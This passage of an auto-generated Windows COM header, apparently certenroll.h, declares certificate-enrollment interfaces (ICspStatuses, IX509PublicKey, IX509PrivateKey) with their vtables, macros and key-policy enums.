    ( (This)->lpVtbl -> get_Ordinal(This,pValue) ) 

#define ICspStatus_put_Ordinal(This,Value)	\
    ( (This)->lpVtbl -> put_Ordinal(This,Value) ) 

#define ICspStatus_get_CspAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspAlgorithm(This,ppValue) ) 

#define ICspStatus_get_CspInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformation(This,ppValue) ) 

#define ICspStatus_get_EnrollmentStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_EnrollmentStatus(This,ppValue) ) 

#define ICspStatus_get_DisplayName(This,pValue)	\
    ( (This)->lpVtbl -> get_DisplayName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspStatus_INTERFACE_DEFINED__ */


#ifndef __ICspStatuses_INTERFACE_DEFINED__
#define __ICspStatuses_INTERFACE_DEFINED__

/* interface ICspStatuses */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspStatuses;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30a-217d-11da-b2a4-000e7bbb2b09")
    ICspStatuses : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspStatus *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [helpstring][custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOrdinal( 
            /* [in] */ LONG Ordinal,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOperations( 
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByProvider( 
            /* [in] */ __RPC__in_opt ICspStatus *pCspStatus,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICspStatusesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspStatuses * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspStatuses * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspStatuses * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspStatuses * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspStatuses * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspStatuses * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in_opt ICspStatus *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspStatuses * This);
        
        /* [helpstring][custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOrdinal )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Ordinal,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOperations )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByProvider )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in_opt ICspStatus *pCspStatus,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        END_INTERFACE
    } ICspStatusesVtbl;

    interface ICspStatuses
    {
        CONST_VTBL struct ICspStatusesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspStatuses_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspStatuses_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspStatuses_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspStatuses_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspStatuses_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspStatuses_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspStatuses_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspStatuses_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspStatuses_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspStatuses_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspStatuses_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspStatuses_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspStatuses_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspStatuses_get_ItemByName(This,strCspName,strAlgorithmName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strCspName,strAlgorithmName,ppValue) ) 

#define ICspStatuses_get_ItemByOrdinal(This,Ordinal,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOrdinal(This,Ordinal,ppValue) ) 

#define ICspStatuses_get_ItemByOperations(This,strCspName,strAlgorithmName,Operations,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOperations(This,strCspName,strAlgorithmName,Operations,ppValue) ) 

#define ICspStatuses_get_ItemByProvider(This,pCspStatus,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByProvider(This,pCspStatus,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspStatuses_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0011 */
/* [local] */ 

typedef 
enum KeyIdentifierHashAlgorithm
    {	SKIHashDefault	= 0,
	SKIHashSha1	= 1,
	SKIHashCapiSha1	= 2
    } 	KeyIdentifierHashAlgorithm;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0011_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0011_v0_0_s_ifspec;

#ifndef __IX509PublicKey_INTERFACE_DEFINED__
#define __IX509PublicKey_INTERFACE_DEFINED__

/* interface IX509PublicKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PublicKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30b-217d-11da-b2a4-000e7bbb2b09")
    IX509PublicKey : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [in] */ __RPC__in BSTR strEncodedParameters,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromEncodedPublicKeyInfo( 
            /* [in] */ __RPC__in BSTR strEncodedPublicKeyInfo,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Algorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedKey( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedParameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ComputeKeyIdentifier( 
            /* [in] */ KeyIdentifierHashAlgorithm Algorithm,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509PublicKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PublicKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PublicKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PublicKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PublicKey * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [in] */ __RPC__in BSTR strEncodedParameters,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromEncodedPublicKeyInfo )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in BSTR strEncodedPublicKeyInfo,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PublicKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PublicKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedKey )( 
            __RPC__in IX509PublicKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedParameters )( 
            __RPC__in IX509PublicKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ComputeKeyIdentifier )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ KeyIdentifierHashAlgorithm Algorithm,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509PublicKeyVtbl;

    interface IX509PublicKey
    {
        CONST_VTBL struct IX509PublicKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PublicKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PublicKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PublicKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PublicKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PublicKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PublicKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PublicKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PublicKey_Initialize(This,pObjectId,strEncodedKey,strEncodedParameters,Encoding)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,strEncodedKey,strEncodedParameters,Encoding) ) 

#define IX509PublicKey_InitializeFromEncodedPublicKeyInfo(This,strEncodedPublicKeyInfo,Encoding)	\
    ( (This)->lpVtbl -> InitializeFromEncodedPublicKeyInfo(This,strEncodedPublicKeyInfo,Encoding) ) 

#define IX509PublicKey_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PublicKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PublicKey_get_EncodedKey(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedKey(This,Encoding,pValue) ) 

#define IX509PublicKey_get_EncodedParameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedParameters(This,Encoding,pValue) ) 

#define IX509PublicKey_ComputeKeyIdentifier(This,Algorithm,Encoding,pValue)	\
    ( (This)->lpVtbl -> ComputeKeyIdentifier(This,Algorithm,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PublicKey_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0012 */
/* [local] */ 

typedef 
enum X509PrivateKeyExportFlags
    {	XCN_NCRYPT_ALLOW_EXPORT_NONE	= 0,
	XCN_NCRYPT_ALLOW_EXPORT_FLAG	= 0x1,
	XCN_NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG	= 0x2,
	XCN_NCRYPT_ALLOW_ARCHIVING_FLAG	= 0x4,
	XCN_NCRYPT_ALLOW_PLAINTEXT_ARCHIVING_FLAG	= 0x8
    } 	X509PrivateKeyExportFlags;

typedef 
enum X509PrivateKeyUsageFlags
    {	XCN_NCRYPT_ALLOW_USAGES_NONE	= 0,
	XCN_NCRYPT_ALLOW_DECRYPT_FLAG	= 0x1,
	XCN_NCRYPT_ALLOW_SIGNING_FLAG	= 0x2,
	XCN_NCRYPT_ALLOW_KEY_AGREEMENT_FLAG	= 0x4,
	XCN_NCRYPT_ALLOW_ALL_USAGES	= 0xffffff
    } 	X509PrivateKeyUsageFlags;

typedef 
enum X509PrivateKeyProtection
    {	XCN_NCRYPT_UI_NO_PROTECTION_FLAG	= 0,
	XCN_NCRYPT_UI_PROTECT_KEY_FLAG	= 0x1,
	XCN_NCRYPT_UI_FORCE_HIGH_PROTECTION_FLAG	= 0x2
    } 	X509PrivateKeyProtection;

typedef 
enum X509PrivateKeyVerify
    {	VerifyNone	= 0,
	VerifySilent	= 1,
	VerifySmartCardNone	= 2,
	VerifySmartCardSilent	= 3,
	VerifyAllowUI	= 4
    } 	X509PrivateKeyVerify;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0012_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0012_v0_0_s_ifspec;

#ifndef __IX509PrivateKey_INTERFACE_DEFINED__
#define __IX509PrivateKey_INTERFACE_DEFINED__

/* interface IX509PrivateKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PrivateKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30c-217d-11da-b2a4-000e7bbb2b09")
    IX509PrivateKey : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Open( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Create( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Close( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Delete( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Verify( 
            /* [in] */ X509PrivateKeyVerify VerifyType) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Import( 
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Export( 
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ExportPublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ContainerName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ContainerName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ContainerNamePrefix( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ContainerNamePrefix( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ReaderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ReaderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspInformations( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CspInformations( 
            /* [in] */ __RPC__in_opt ICspInformations *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspStatus( 
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CspStatus( 
            /* [in] */ __RPC__in_opt ICspStatus *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ProviderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ProviderType( 
            /* [retval][out] */ __RPC__out X509ProviderType *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ProviderType( 
            /* [in] */ X509ProviderType Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_LegacyCsp( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_LegacyCsp( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Algorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Algorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeySpec( 
            /* [in] */ X509KeySpec Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Length( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ExportPolicy( 
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ExportPolicy( 
            /* [in] */ X509PrivateKeyExportFlags Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyUsage( 
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyUsage( 
            /* [in] */ X509PrivateKeyUsageFlags Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyProtection( 
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyProtection( 
            /* [in] */ X509PrivateKeyProtection Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MachineContext( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_MachineContext( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SecurityDescriptor( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SecurityDescriptor( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UniqueContainerName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Opened( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DefaultContainer( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Existing( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Existing( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Pin( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_FriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Description( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Description( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509PrivateKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PrivateKey * This);
        
